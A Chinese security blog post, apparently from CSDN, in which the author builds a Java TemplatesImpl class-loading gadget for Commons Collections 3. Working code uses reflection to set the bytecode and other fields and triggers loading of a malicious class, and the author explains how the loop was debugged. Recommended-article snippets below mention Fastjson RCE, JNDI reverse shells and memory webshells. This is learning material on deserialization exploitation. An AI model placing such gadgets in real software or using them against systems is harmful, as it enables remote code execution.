记一个搞笑的自写类加载TemplatesImpl

已于 2024-08-01 13:37:24 修改
阅读量291 收藏 2
点赞数 7
文章标签: java web安全
于 2024-08-01 11:25:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51796436/article/details/140843067
版权

今天没事想自己写个CC3类加载
结果为了顺利触发到TemplatesImpl#getTransletInstance的newInstance给我整急眼了,使劲改字段强行通过循环
在这里插入图片描述刚才判定了,_auxClasses为transient,不能用这种方法

结果搞了个下面的代码出来

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Properties;

public class CC3TemplatesImpl {
    public static void main(String[] args) throws Exception {
        byte[] code = Files.readAllBytes(Paths.get("E:\\CODE_COLLECT\\CC6TiedMapEntry.class"));
        TemplatesImpl templatesClass = new TemplatesImpl();
        Field[] fields = templatesClass.getClass().getDeclaredFields();
        for (Field field : fields) {
            field.setAccessible(true);
            if (field.getName().equals("_bytecodes")) {
                field.set(templatesClass, new byte[][]{code});
            } else if (field.getName().equals("_name")) {
                field.set(templatesClass, "CC6TiedMapEntry");
            } else if (field.getName().equals("_tfactory")) {
                field.set(templatesClass, new TransformerFactoryImpl());
            } else if (field.getName().equals("_outputProperties")) {
                field.set(templatesClass, new Properties());
            } else if (field.getName().equals("_transletIndex")) {
                field.set(templatesClass, 0);
            } else if (field.getName().equals("_auxClasses")) {
                field.set(templatesClass, new HashMap<>());
            }
        }
        templatesClass.newTransformer();
    }
}

你别说,还真TM能跑。请添加图片描述
说一下怎么搞的
调试的时候bytecode数组只有一个恶意类,就创建不了hashMap,后面就put不进去。

在这里插入图片描述
于是我bytecode传了两个恶意数组

	field.set(templatesClass, new byte[][]{code,code});

结果进第二个catch,hashMap不能重复put
在这里插入图片描述
我又传了个空字节,我去,空字节不能defineClass,连循环都出不了

	field.set(templatesClass, new byte[][]{code,new byte[0]});

突然想到,我自己搞个hashMap就完了,用他的干毛啊
于是

else if (field.getName().equals("_auxClasses")) {
                field.set(templatesClass, new HashMap<>());
            }

感觉像个大铸币写的

马戏团小丑
关注
Java代码审计——Commons Collections2 TemplatesImpl底层调用链
王嘟嘟的博客
11-25 1139
0x00 前言 分析完了CC1和TransformedMap链,接着来看CC2这个链,看了一些文章,但是仅仅是看的话,无法真切的理解其中的含义,所以需要进行自己分析,并且录其中关键点。这一篇主要是把底层调用遇到的问题讲清楚。 0x01 底层调用链 底层调用链分为两层,一层是Java类字节化,一层是通过TemplatesImpl进行调用。 1.Java类字节化 这里Java字节化选择的是Javassist。 简单的说一下Javassist,Javassist主要是用来做动态生成Java类的库,可以从输入的内
近期一次护网蓝队面试录分享
2301_82000839的博客
05-27 423
如实回答学校经历,是否参与项目,尽量简短把你参与的项目和成功说出来就行。
【面试】一次安恒面试及总结
今天是几号的博客
04-07 2829
面试整体围绕简历上内容来提问,因为实习岗所以问的难度比较浅,但是范围还是蛮广的,通过面试来检测自己当前学习的状况还是挺不错的。
【面试】一次安恒面试及总结_安恒信息公司java面试
2401_85112032的博客
05-28 801
2、端口判断关系型数据库:Oracle数据库默认端口号为,1521;MySQL数据库默认端口号为,3306;SQLServer数据库默认端口号为,1433;postgreSQL数据库默认端口号为,5432;NOSQL数据库:MongoDB默认端口号为:27017;Redis默认端口号为:6379;memcached默认端口号为:11211;
Web】log4j打JNDI专题刷题
uuzeray的博客
04-21 606
高版本下打jndi不能加载远程恶意类,所以选择打二次反序列化的方式,用的是fj1.2.8的原生反序列化链子。运行生成的base64payload再放进恶意LDAPServer的回包中。这次换JNDIExploit来打,简单又方便啊家人们😋。访问/webstudy/hello-fengxuan。javac Rev.java得到Rev.class。1339端口起一个恶意ldap服务器。把恶意字节码放在1338端口。起恶意LDAPServer。监听,反弹shell。监听,反弹shell。监听,反弹shell。
ctf刷题录1(完结)
m0_73973498的博客
10-08 734
可以看出theme后面的是经过base64加密的,解码后为:/var/www/html/system/tmp/theme/default/a.zip 发现就是该文件的地址,猜测flag文件在根目录下,将/flag加密后的L2ZsYWc=拼接上去,得到http://node4.anna.nssctf.cn:28521/admin.php?(这道题搜不到)然后就是测试后台网站,御剑扫出了admin.php,进入后发现是一个登录界面,提示密码是五位数字,可以爆破一下,最后账号是admin,密码是12345。
Fastjson 1.2.24远程代码执行漏洞(com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
systemino的博客
11-24 1108
1.漏洞信息 1.1 漏洞简介 ·漏洞名称:Fastjson 1.2.24远程代码执行漏洞(com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl) ·漏洞编号:无 ·漏洞类型:远程代码执行 ·CVSS评分:无 ·漏洞危害等级:高危 1.2 组件概述 Fastjson是一个Java语言编写的高性能功能完善的JSON库。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的...
github学习录目录
LYJ20010728的博客
03-16 6774
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
文件上传之负载均衡踩坑
weixin_50464560的博客
09-30 761
事情是这样的,最近有个渗透的小伙伴找我,它通过shiro反序列化植入内存马获取了一个shell,但这台主机上有负载均衡,所以通过冰蝎、蚁剑等连接工具上传大文件会上传失败,需要我这边提供解决方案。 问题分析 问题一:为什么shell管理工具文件上传需要分包? 我使用蚁剑做了测试,蚁剑配置shell可以在其他设置中设置分片的大小,默认是500kb,那有小伙伴可能要说了,那我将这个值改成一个比较大的值不就可以一次性上传大文件也就相当于解决了负载均衡的问题。 理论上是没错的,我们...
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 1021
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
fastjson 判断是否包含_fastjson漏洞学习分析
weixin_34551573的博客
01-11 1193
0x00前言前面写了fastjson的利用,现在补上fastjson的分析,后面附上探测后端是否使用fastjon的方法(1.2.67)。0x01fastjson基本使用toJSONString()parseObject()这两个函数一个将对象转化为json字符串,一个将json字符串反序列化成对象。image.png一般来说使用第一种方法输出json字符串,这里将第二种方法写出来,是想体现fas...
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 2301
Fastjson组件反序列化分析,从基础到RCE的过程笔
Java代码审计】反序列化漏洞篇
大河之犬的博客
03-25 954
发送方必须将要发送的 Java 对象序列化为字节流,接收方则需要将字节流再反序列化,还原得到 Java 对象,才能实现正常通信。当攻击者输入精心构造的字节流被反序列化为恶意对象时,就会造成一系列的安全问题。在 Java 原生的API 中,序列化的过程由类的方法实现,反序列化过程由类的方法实现。将字节流还原成对象的过程都可以称作反序列化,例如,JSON 串或 XML 串还原成对象的过程也是反序列化的过程。同理,将对象转化成 JSON 串或 XML 串的过程也是序列化的过程。
BCEL ClassLoader去哪了?
离别歌
10-26 1518
com.sun.org.apache.bcel.internal.util.ClassLoader是常常在构造漏洞利用POC时用到的类。但是,我前几天在写《Java安全漫谈》的时候,偶然...
JDK1.0主要特性
FoolRabbit的专栏
10-06 393
JDK1.0主要特性。
2024Java最新面试题总结(针对于一些小厂、中厂)
weixin_62375676的博客
10-07 1156
2024最新Java面试题,针对一些小厂,中厂
SpringBoot集成MinIO
QB哥欢迎您
10-05 1237
MinIO:它是一个对象存储服务。类似于云服务器厂商提供的OSS服务。在项目中经常有大量的图片等文件数据需要存储,可以借助云服务器的OSS服务,也可以使用MinIO搭建自己的对象存储服务。
已解决-Sentinel控制台明明正常启动,扫描不到客户端应用
最新发布
qq_46248151的博客
10-08 314
经排查才发现,我在启动了Sentinel控制台之后,对SpringBoot应用做了配置的更新,于是重启了SpringBoot服务,这时SpringBoot是没有任何访问的。今天启动Sentinel控制台的时候,明明启动成功,无报错,浏览器能正常访问,但就是无论如何都刷新不出来应用。
Java类加载机制:深入理解双亲委派模型
- 可见性:如果一个类由某个类加载器加载,那么这个类对由其直接或间接父加载器加载的类可见,反之则不可见。 5)类加载的应用场景: - OSGi服务框架中,每个模块有自己的类加载器,实现类的隔离加载。 - 应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值